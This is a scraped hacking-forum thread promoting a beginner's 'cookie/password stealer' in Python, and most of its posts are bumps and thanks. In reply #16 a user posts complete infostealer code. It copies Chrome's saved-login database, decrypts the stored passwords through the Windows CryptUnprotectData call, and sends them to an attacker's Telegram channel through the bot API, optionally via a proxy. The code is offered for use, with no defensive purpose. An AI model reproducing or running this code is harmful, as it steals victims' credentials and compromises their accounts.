Navigation X
ALERT
Click here to register with a few steps and explore all our cool stuff we have to offer!



 13426

Create ur Own Cookie/Password Stealer with Python very EZ for Beginners

by Musashi_Miyamoto - 05 May, 2021 - 08:12 PM
This post is by a banned member (Magmah) - Unhide
This post is by a banned member (Musashi_Miyamoto) - Unhide
324
Posts
128
Threads
3 Years of service
#10
This is a bump
This post is by a banned member (NicoLex) - Unhide
This post is by a banned member (Musashi_Miyamoto) - Unhide
324
Posts
128
Threads
3 Years of service
#12
This is a bump
This post is by a banned member (Musashi_Miyamoto) - Unhide
324
Posts
128
Threads
3 Years of service
#13
This is a bump
This post is by a banned member (babonate) - Unhide
babonate  
Registered
49
Posts
0
Threads
4 Years of service
#14
thanks for this nice post i will try it out :D
This post is by a banned member (MARGIN) - Unhide
MARGIN  
Registered
11
Posts
1
Threads
4 Years of service
#15
Thank you big daddy
This post is by a banned member (falcon711) - Unhide
falcon711  
Registered
15
Posts
0
Threads
3 Years of service
#16
import os, sqlite3, win32crypt, requests, shutil   USE_PROXY = True PROXY_IP = ... PROXY_PORT = ...   URL = 'https://api.telegram.org/bot%s/sendMessage?chat_id=%s&text=%s&parse_mode=html' TOKEN = ... CHANNELID = ...   databasePath = os.environ['LOCALAPPDATA'] + '\\Google\\Chrome\\User Data\\Default\\Login Data' result = '=== Extracted from %s computer ===\n' % os.environ['USERNAME']   if os.path.exists(databasePath): try: shutil.copy(databasePath, './database') connection = sqlite3.connect('./database')   cursor = connection.cursor() query = cursor.execute('SELECT action_url, username_value, password_value FROM logins') value = query.fetchall()   connection.close() os.remove('./database')   for info in value: password = win32crypt.CryptUnprotectData(info[2], None, None, None, 0)[1] if password: result += 'Host: %s\nLogin: %s\nPassword: %s\n\n' % (info[:2] + (password.decode('utf-8'),)) except Exception as e: result = '[-] Error: ' + str(e) else: result = '[!] Google Chrome is not installed!'   proxyDict = {'https': 'https://%s:%s' % (PROXY_IP, PROXY_PORT)} if USE_PROXY else None   open(os.environ['USERNAME'] + '.txt', mode = 'w').write(result.strip()) requests.get(URL % (TOKEN, CHANNELID, '<pre>%s</pre>' % result), proxies = proxyDict)

Create an account or sign in to comment
You need to be a member in order to leave a comment
Create an account
Sign up for a new account in our community. It's easy!
or
Sign in
Already have an account? Sign in here.


Forum Jump:


Users browsing this thread: 5 Guest(s)